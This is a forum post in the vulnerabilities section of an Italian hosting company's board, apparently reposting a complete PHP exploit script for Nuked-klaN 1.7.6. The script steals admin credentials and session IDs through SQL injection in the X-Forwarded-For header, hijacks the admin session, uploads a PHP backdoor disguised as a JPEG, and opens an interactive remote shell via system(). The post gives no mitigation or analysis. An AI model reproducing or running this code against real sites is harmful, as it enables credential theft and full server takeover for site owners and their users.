Torna indietro   Serverplan Forum > Serverplan comunica > Vulnerabilità
Nuked-klaN 1.7.6 Remote Code Execution Exploit Nuked-klaN 1.7.6 Remote Code Execution Exploit
Registrazione FAQ Lista utenti Calendario Cerca I messaggi di oggi Segna forums come letti

Rispondi
 
LinkBack Strumenti discussione Modalità visualizzazione
  #1 (permalink)  
Vecchio 06-05-2007, 00.46.12
Administrator
Amministratore
  
Data registrazione: 12-09-2002
Messaggi: 3,420
serverplan ha disabilitato la reputazione
Predefinito Nuked-klaN 1.7.6 Remote Code Execution Exploit
<?php
#
# Nuked-klaN 1.7.6 Remote Code Execution Exploit
# ------------------------------------------------
# Author: DarkFig <gmdarkfig@gmail.com>
# Website: http://www.acid-root.new.fr/
# PHP conditions: None =]
# Private since 2 months.
#
error_reporting(E_ALL ^ E_NOTICE); # This file require the PhpSploit class.
require("phpsploitclass.php"); # If you want to use this class, the latest
# version can be downloaded from acid-root.new.fr.

$xpl = new phpsploit();
$url = 'http://localhost/nk/'; # url
$prx = ''; # proxy <proxyip>:<proxyport>
$pra = ''; # basic authentification <proxyuserroxypwd>

$xpl->agent("Firefox");
$xpl->allowredirection(0);
$xpl->cookiejar(0);

if($prx) $xpl->proxy($prx);
if($pra) $xpl->proxyauth($pra);

$config = array();
$config[] = 'nuked'; # table prefix
$config[] = 'nuked'; # cookie prefix
$config[] = 'ORDER by date LIMIT 1'; # sql conditions
$config[] = 'HAK'; # match, length <= 3
$config[] = '<?php'."\n" # php code
.'error_reporting(0);'
.'if(isset($_SERVER[HTTP_SHELL]))'
.'{print 123456789;eval($_SERVER[HTTP_SHELL]);exit(123456789);}'
.'else {include(\'./Includes/blocks/block_login.php\');$blok[type]=\'login\';} ?>';

$request = array();
$request[] = "'$config[3]0',(SELECT pseudo FROM $config[0]_users $config[2]),'$config[3]0'";
$request[] = "'$config[3]1',(SELECT pass FROM $config[0]_users $config[2]),'$config[3]1'";
$request[] = "'$config[3]2',(SELECT id FROM $config[0]_users $config[2]),'$config[3]2'";
$request[] = "'$config[3]3',(SELECT id FROM $config[0]_sessions WHERE user_id=(SELECT id FROM $config[0]_users $config[2])),'$config[3]3'";

for($i=0;$i<count($request);$i++)
{
$deb = rand(0,10000)."',2,".(time()+500000).",'',(SELECT CONCAT(";
$sql = $deb.$request[$i]."))) #";
$xpl->addheader("X-Forwarded-For",$sql);
$xpl->get($url);
$xpl->reset('header');
}

if(!preg_match_all("#$config[3]([0123]{1})(\S*)$config[3]([0123]{1})#",$xpl->getcontent(),$matches))
die("Exploit Failed");

$what = array("login","passwd","user_id","session");
for($i=0;$i<count($what);$i++)
print "\n".$what[$i]." -> ".$matches[2][$i];

if(empty($matches[2][3]))
exit("\nNo session found");

# Logged in as admin
$name = array("admin_session","user_id","sess_id");
$xpl->addcookie($config[1].'_'.$name[0],$matches[2][2]);
$xpl->addcookie($config[1].'_'.$name[1],$matches[2][2]);
$xpl->addcookie($config[1].'_'.$name[2],$matches[2][3]);

$phpc = array(
frmdt_url => $url.'?file=User&op=update_pref',
'fichiernom' => array(frmdt_filename => '1.jpg',
frmdt_content => $config[4]));

$xpl->addheader('Referer',$url);
$xpl->formdata($phpc);
$xpl->get($url.'?file=User&op=edit_pref');

if(!preg_match('#\<input name=\"photo\" value=\"(\S+)\"#',$xpl->getcontent(),$match)) exit("\nNo file found");
else print "\n\$shell> ";

$sql = array();
$sql[] = "ALTER TABLE $config[0]_block CHANGE `type` `type` VARCHAR(60) CHARACTER SET latin1 COLLATE latin1_swedish_ci NOT NULL DEFAULT 0;";/*
$sql[] = "UPDATE $config[0]_config SET avatar_upload=".char('on')." WHERE name=".char('avatar_upload').";";*/
$sql[] = "UPDATE $config[0]_block SET type=".char('/../../../'.$match[1]."\x00")." WHERE bid=1;";
$sql[] = "DELETE FROM $config[0]_nbconnecte;";

for($i=0;$i<count($sql);$i++)
$xpl->post($url.'?file=Admin&page=mysql&op=upgrade_db', 'upgrade='.$sql[$i]);

while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN)))))
{
# 0'); include('./conf.inc.php'); print $global['db_pass']; //
$xpl->reset('header');
$xpl->addheader('Shell',"system('$cmd');");
$xpl->get($url);
$data = explode('123456789',$xpl->getcontent());
print $data[1]."\n\$shell> ";
}

function char($data)
{
$char='CHAR(';
for($i=0;$i<strlen($data);$i++)
{
$char .= ord($data[$i]);
if($i != (strlen($data)-1)) $char .= ',';
}
return $char.')';
}
?>
Rispondi citando
Rispondi

« Discussione precedente | Prossima discussione »
Strumenti discussione
Modalità visualizzazione
Modalità lineare Modalità lineare

Regole di scrittura
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is Attivato
Le faccine sono Attivato
Il codice [IMG] è Attivato
Il codice HTML è Disattivato
Trackbacks are Attivato
Pingbacks are Attivato
Refbacks are Attivato


Discussioni simili
Discussione Autore discussione Forum Risposte Ultimo messaggio
Joomla <= v1.0.14-RC1(Index.php) Remote File Inclusion Exploit serverplan Vulnerabilità 0 08-02-2008 23.33.04
phpBB (privmsg.php) XSS Exploit serverplan Vulnerabilità 0 11-01-2007 19.05.34
PHP-Stats <= 0.1.9.1 remote commands execution serverplan Vulnerabilità 0 06-03-2006 00.37.26
AllMyLinks PHP Code Injection vulnerability serverplan Vulnerabilità 0 16-02-2004 21.49.54
PHP Code Injection Vulnerabilities in ezContents 2.0.2 serverplan Vulnerabilità 0 11-02-2004 21.44.41


Tutti gli orari sono GMT +1. Adesso sono le 13.47.53.

Contatta staff - Archivio - Inizio pagina

Powered by vBulletin versione 3.7.3
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO 3.1.0
Traduzione italiana : www.vbulletin.it